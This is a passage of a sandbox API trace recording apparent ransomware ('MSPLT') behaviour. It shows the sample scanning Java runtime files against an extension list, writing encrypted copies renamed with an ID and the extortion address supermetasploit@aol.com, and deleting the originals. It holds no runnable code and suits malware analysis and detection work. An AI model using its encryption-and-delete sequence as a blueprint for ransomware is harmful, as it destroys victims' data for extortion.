-1 [0314.385] lstrlenW (lpString=".xlsx") returned 5 [0314.385] lstrcmpiW (lpString1=".xlsx", lpString2="ccess") returned -1 [0314.385] lstrlenW (lpString=".ppt") returned 4 [0314.385] lstrcmpiW (lpString1=".ppt", lpString2="cess") returned -1 [0314.385] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 66 [0314.385] lstrlenW (lpString=".zip") returned 4 [0314.385] lstrcmpiW (lpString1=".zip", lpString2="cess") returned -1 [0314.385] lstrlenW (lpString=".rar") returned 4 [0314.385] lstrcmpiW (lpString1=".rar", lpString2="cess") returned -1 [0314.386] lstrlenW (lpString=".bz2") returned 4 [0314.386] lstrcmpiW (lpString1=".bz2", lpString2="cess") returned -1 [0314.386] lstrlenW (lpString=".7z") returned 3 [0314.386] lstrcmpiW (lpString1=".7z", lpString2="ess") returned -1 [0314.386] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 66 [0314.386] lstrlenW (lpString=".dbf") returned 4 [0314.386] lstrcmpiW (lpString1=".dbf", lpString2="cess") returned -1 [0314.386] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 66 [0314.386] lstrlenW (lpString=".1cd") returned 4 [0314.386] lstrcmpiW (lpString1=".1cd", lpString2="cess") returned -1 [0314.386] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 66 [0314.386] lstrlenW (lpString=".jpg") returned 4 [0314.386] lstrcmpiW (lpString1=".jpg", lpString2="cess") returned -1 [0314.386] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 66 [0314.386] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 66 [0314.386] lstrlenW (lpString=".doc") returned 4 [0314.386] lstrcmpiW (lpString1=".doc", lpString2="cess") returned -1 [0314.386] lstrlenW (lpString=".docx") returned 5 [0314.386] lstrcmpiW (lpString1=".docx", lpString2="ccess") returned -1 [0314.386] lstrlenW (lpString=".pdf") returned 4 [0314.387] lstrcmpiW (lpString1=".pdf", lpString2="cess") returned -1 [0314.387] lstrlenW (lpString=".xls") returned 4 [0314.387] lstrcmpiW (lpString1=".xls", lpString2="cess") returned -1 [0314.387] lstrlenW (lpString=".xlsx") returned 5 [0314.387] lstrcmpiW (lpString1=".xlsx", lpString2="ccess") returned -1 [0314.387] lstrlenW (lpString=".ppt") returned 4 [0314.387] lstrcmpiW (lpString1=".ppt", lpString2="cess") returned -1 [0314.387] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 66 [0314.387] lstrlenW (lpString=".zip") returned 4 [0314.387] lstrcmpiW (lpString1=".zip", lpString2="cess") returned -1 [0314.387] lstrlenW (lpString=".rar") returned 4 [0314.387] lstrcmpiW (lpString1=".rar", lpString2="cess") returned -1 [0314.387] lstrlenW (lpString=".bz2") returned 4 [0314.387] lstrcmpiW (lpString1=".bz2", lpString2="cess") returned -1 [0314.387] lstrlenW (lpString=".7z") returned 3 [0314.387] lstrcmpiW (lpString1=".7z", lpString2="ess") returned -1 [0314.387] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 66 [0314.387] lstrlenW (lpString=".dbf") returned 4 [0314.387] lstrcmpiW (lpString1=".dbf", lpString2="cess") returned -1 [0314.387] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 66 [0314.387] lstrlenW (lpString=".1cd") returned 4 [0314.387] lstrcmpiW (lpString1=".1cd", lpString2="cess") returned -1 [0314.387] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 66 [0314.387] lstrlenW (lpString=".jpg") returned 4 [0314.387] lstrcmpiW (lpString1=".jpg", lpString2="cess") returned -1 [0314.388] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0314.388] lstrlenW (lpString="plugin.jar") returned 10 [0314.388] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.389] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=1923211) returned 1 [0314.389] CloseHandle (hObject=0x540) returned 1 [0314.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar")) returned 0x20 [0314.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.389] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0314.389] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 49 [0314.389] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 49 [0314.390] lstrlenW (lpString=".doc") returned 4 [0314.390] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.390] lstrlenW (lpString=".docx") returned 5 [0314.390] lstrcmpiW (lpString1=".docx", lpString2="n.jar") returned -1 [0314.390] lstrlenW (lpString=".pdf") returned 4 [0314.390] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.390] lstrlenW (lpString=".xls") returned 4 [0314.390] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.390] lstrlenW (lpString=".xlsx") returned 5 [0314.390] lstrcmpiW (lpString1=".xlsx", lpString2="n.jar") returned -1 [0314.390] lstrlenW (lpString=".ppt") returned 4 [0314.390] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.390] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 49 [0314.390] lstrlenW (lpString=".zip") returned 4 [0314.390] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.390] lstrlenW (lpString=".rar") returned 4 [0314.390] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.390] lstrlenW (lpString=".bz2") returned 4 [0314.390] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.390] lstrlenW (lpString=".7z") returned 3 [0314.390] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.390] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 49 [0314.390] lstrlenW (lpString=".dbf") returned 4 [0314.390] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.390] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 49 [0314.390] lstrlenW (lpString=".1cd") returned 4 [0314.390] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.391] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 49 [0314.391] lstrlenW (lpString=".jpg") returned 4 [0314.391] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.391] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 49 [0314.391] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 49 [0314.391] lstrlenW (lpString=".doc") returned 4 [0314.391] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.391] lstrlenW (lpString=".docx") returned 5 [0314.391] lstrcmpiW (lpString1=".docx", lpString2="n.jar") returned -1 [0314.391] lstrlenW (lpString=".pdf") returned 4 [0314.391] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.391] lstrlenW (lpString=".xls") returned 4 [0314.391] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.391] lstrlenW (lpString=".xlsx") returned 5 [0314.391] lstrcmpiW (lpString1=".xlsx", lpString2="n.jar") returned -1 [0314.391] lstrlenW (lpString=".ppt") returned 4 [0314.391] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.391] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 49 [0314.391] lstrlenW (lpString=".zip") returned 4 [0314.391] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.391] lstrlenW (lpString=".rar") returned 4 [0314.391] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.391] lstrlenW (lpString=".bz2") returned 4 [0314.391] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.391] lstrlenW (lpString=".7z") returned 3 [0314.392] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.392] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 49 [0314.392] lstrlenW (lpString=".dbf") returned 4 [0314.392] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.392] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 49 [0314.392] lstrlenW (lpString=".1cd") returned 4 [0314.392] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.392] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 49 [0314.392] lstrlenW (lpString=".jpg") returned 4 [0314.392] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.392] lstrcmpiW (lpString1=".ja", lpString2=".MSPLT") returned -1 [0314.392] lstrlenW (lpString="psfont.properties.ja") returned 20 [0314.392] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.394] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=2796) returned 1 [0314.394] CloseHandle (hObject=0x540) returned 1 [0314.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja")) returned 0x20 [0314.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.395] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.395] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.395] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.395] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0314.396] GetLastError () returned 0x0 [0314.396] ReadFile (in: hFile=0x540, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0xaec, lpOverlapped=0x0) returned 1 [0314.399] WriteFile (in: hFile=0x420, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xaf0, lpOverlapped=0x0) returned 1 [0314.401] ReadFile (in: hFile=0x540, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.402] WriteFile (in: hFile=0x420, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xfc, lpOverlapped=0x0) returned 1 [0314.402] SetEndOfFile (hFile=0x420) returned 1 [0314.402] CloseHandle (hObject=0x420) returned 1 [0314.402] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.402] SetEndOfFile (hFile=0x540) returned 1 [0314.409] CloseHandle (hObject=0x540) returned 1 [0314.409] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.410] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja")) returned 1 [0314.410] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 59 [0314.410] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 59 [0314.411] lstrlenW (lpString=".doc") returned 4 [0314.411] lstrcmpiW (lpString1=".doc", lpString2="s.ja") returned -1 [0314.411] lstrlenW (lpString=".docx") returned 5 [0314.411] lstrcmpiW (lpString1=".docx", lpString2="es.ja") returned -1 [0314.411] lstrlenW (lpString=".pdf") returned 4 [0314.411] lstrcmpiW (lpString1=".pdf", lpString2="s.ja") returned -1 [0314.411] lstrlenW (lpString=".xls") returned 4 [0314.411] lstrcmpiW (lpString1=".xls", lpString2="s.ja") returned -1 [0314.411] lstrlenW (lpString=".xlsx") returned 5 [0314.411] lstrcmpiW (lpString1=".xlsx", lpString2="es.ja") returned -1 [0314.411] lstrlenW (lpString=".ppt") returned 4 [0314.411] lstrcmpiW (lpString1=".ppt", lpString2="s.ja") returned -1 [0314.411] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 59 [0314.411] lstrlenW (lpString=".zip") returned 4 [0314.411] lstrcmpiW (lpString1=".zip", lpString2="s.ja") returned -1 [0314.411] lstrlenW (lpString=".rar") returned 4 [0314.411] lstrcmpiW (lpString1=".rar", lpString2="s.ja") returned -1 [0314.411] lstrlenW (lpString=".bz2") returned 4 [0314.411] lstrcmpiW (lpString1=".bz2", lpString2="s.ja") returned -1 [0314.411] lstrlenW (lpString=".7z") returned 3 [0314.411] lstrcmpiW (lpString1=".7z", lpString2=".ja") returned -1 [0314.411] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 59 [0314.411] lstrlenW (lpString=".dbf") returned 4 [0314.412] lstrcmpiW (lpString1=".dbf", lpString2="s.ja") returned -1 [0314.412] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 59 [0314.412] lstrlenW (lpString=".1cd") returned 4 [0314.412] lstrcmpiW (lpString1=".1cd", lpString2="s.ja") returned -1 [0314.412] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 59 [0314.412] lstrlenW (lpString=".jpg") returned 4 [0314.412] lstrcmpiW (lpString1=".jpg", lpString2="s.ja") returned -1 [0314.412] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 59 [0314.412] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 59 [0314.412] lstrlenW (lpString=".doc") returned 4 [0314.412] lstrcmpiW (lpString1=".doc", lpString2="s.ja") returned -1 [0314.412] lstrlenW (lpString=".docx") returned 5 [0314.412] lstrcmpiW (lpString1=".docx", lpString2="es.ja") returned -1 [0314.412] lstrlenW (lpString=".pdf") returned 4 [0314.412] lstrcmpiW (lpString1=".pdf", lpString2="s.ja") returned -1 [0314.412] lstrlenW (lpString=".xls") returned 4 [0314.412] lstrcmpiW (lpString1=".xls", lpString2="s.ja") returned -1 [0314.412] lstrlenW (lpString=".xlsx") returned 5 [0314.412] lstrcmpiW (lpString1=".xlsx", lpString2="es.ja") returned -1 [0314.412] lstrlenW (lpString=".ppt") returned 4 [0314.412] lstrcmpiW (lpString1=".ppt", lpString2="s.ja") returned -1 [0314.412] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 59 [0314.412] lstrlenW (lpString=".zip") returned 4 [0314.412] lstrcmpiW (lpString1=".zip", lpString2="s.ja") returned -1 [0314.412] lstrlenW (lpString=".rar") returned 4 [0314.412] lstrcmpiW (lpString1=".rar", lpString2="s.ja") returned -1 [0314.413] lstrlenW (lpString=".bz2") returned 4 [0314.413] lstrcmpiW (lpString1=".bz2", lpString2="s.ja") returned -1 [0314.413] lstrlenW (lpString=".7z") returned 3 [0314.413] lstrcmpiW (lpString1=".7z", lpString2=".ja") returned -1 [0314.413] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 59 [0314.413] lstrlenW (lpString=".dbf") returned 4 [0314.413] lstrcmpiW (lpString1=".dbf", lpString2="s.ja") returned -1 [0314.413] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 59 [0314.413] lstrlenW (lpString=".1cd") returned 4 [0314.413] lstrcmpiW (lpString1=".1cd", lpString2="s.ja") returned -1 [0314.413] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja") returned 59 [0314.413] lstrlenW (lpString=".jpg") returned 4 [0314.413] lstrcmpiW (lpString1=".jpg", lpString2="s.ja") returned -1 [0314.413] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0314.413] lstrlenW (lpString="psfontj2d.properties") returned 20 [0314.413] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.414] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=10393) returned 1 [0314.414] CloseHandle (hObject=0x540) returned 1 [0314.414] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties")) returned 0x20 [0314.414] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.414] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.415] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.415] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.415] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0314.663] GetLastError () returned 0x0 [0314.664] ReadFile (in: hFile=0x540, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x2899, lpOverlapped=0x0) returned 1 [0314.674] WriteFile (in: hFile=0x51c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x28a0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x28a0, lpOverlapped=0x0) returned 1 [0314.676] ReadFile (in: hFile=0x540, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.676] WriteFile (in: hFile=0x51c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xfc, lpOverlapped=0x0) returned 1 [0314.676] SetEndOfFile (hFile=0x51c) returned 1 [0314.676] CloseHandle (hObject=0x51c) returned 1 [0314.676] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.676] SetEndOfFile (hFile=0x540) returned 1 [0314.689] CloseHandle (hObject=0x540) returned 1 [0314.689] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.690] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties")) returned 1 [0314.691] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 59 [0314.691] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 59 [0314.691] lstrlenW (lpString=".doc") returned 4 [0314.691] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0314.691] lstrlenW (lpString=".docx") returned 5 [0314.691] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0314.691] lstrlenW (lpString=".pdf") returned 4 [0314.691] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0314.691] lstrlenW (lpString=".xls") returned 4 [0314.691] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0314.691] lstrlenW (lpString=".xlsx") returned 5 [0314.691] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0314.692] lstrlenW (lpString=".ppt") returned 4 [0314.692] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0314.692] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 59 [0314.692] lstrlenW (lpString=".zip") returned 4 [0314.692] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0314.692] lstrlenW (lpString=".rar") returned 4 [0314.692] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0314.692] lstrlenW (lpString=".bz2") returned 4 [0314.692] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0314.692] lstrlenW (lpString=".7z") returned 3 [0314.692] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0314.692] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 59 [0314.692] lstrlenW (lpString=".dbf") returned 4 [0314.692] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0314.692] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 59 [0314.692] lstrlenW (lpString=".1cd") returned 4 [0314.692] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0314.692] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 59 [0314.692] lstrlenW (lpString=".jpg") returned 4 [0314.692] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0314.692] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 59 [0314.692] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 59 [0314.692] lstrlenW (lpString=".doc") returned 4 [0314.693] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0314.693] lstrlenW (lpString=".docx") returned 5 [0314.693] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0314.693] lstrlenW (lpString=".pdf") returned 4 [0314.693] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0314.693] lstrlenW (lpString=".xls") returned 4 [0314.693] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0314.693] lstrlenW (lpString=".xlsx") returned 5 [0314.693] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0314.693] lstrlenW (lpString=".ppt") returned 4 [0314.693] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0314.693] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 59 [0314.693] lstrlenW (lpString=".zip") returned 4 [0314.693] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0314.693] lstrlenW (lpString=".rar") returned 4 [0314.693] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0314.693] lstrlenW (lpString=".bz2") returned 4 [0314.693] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0314.693] lstrlenW (lpString=".7z") returned 3 [0314.693] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0314.693] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 59 [0314.693] lstrlenW (lpString=".dbf") returned 4 [0314.693] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0314.693] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 59 [0314.693] lstrlenW (lpString=".1cd") returned 4 [0314.694] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0314.694] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 59 [0314.694] lstrlenW (lpString=".jpg") returned 4 [0314.694] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0314.694] lstrcmpiW (lpString1=".security", lpString2=".MSPLT") returned 1 [0314.694] lstrlenW (lpString="java.security") returned 13 [0314.694] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.695] GetFileSizeEx (in: hFile=0x540, 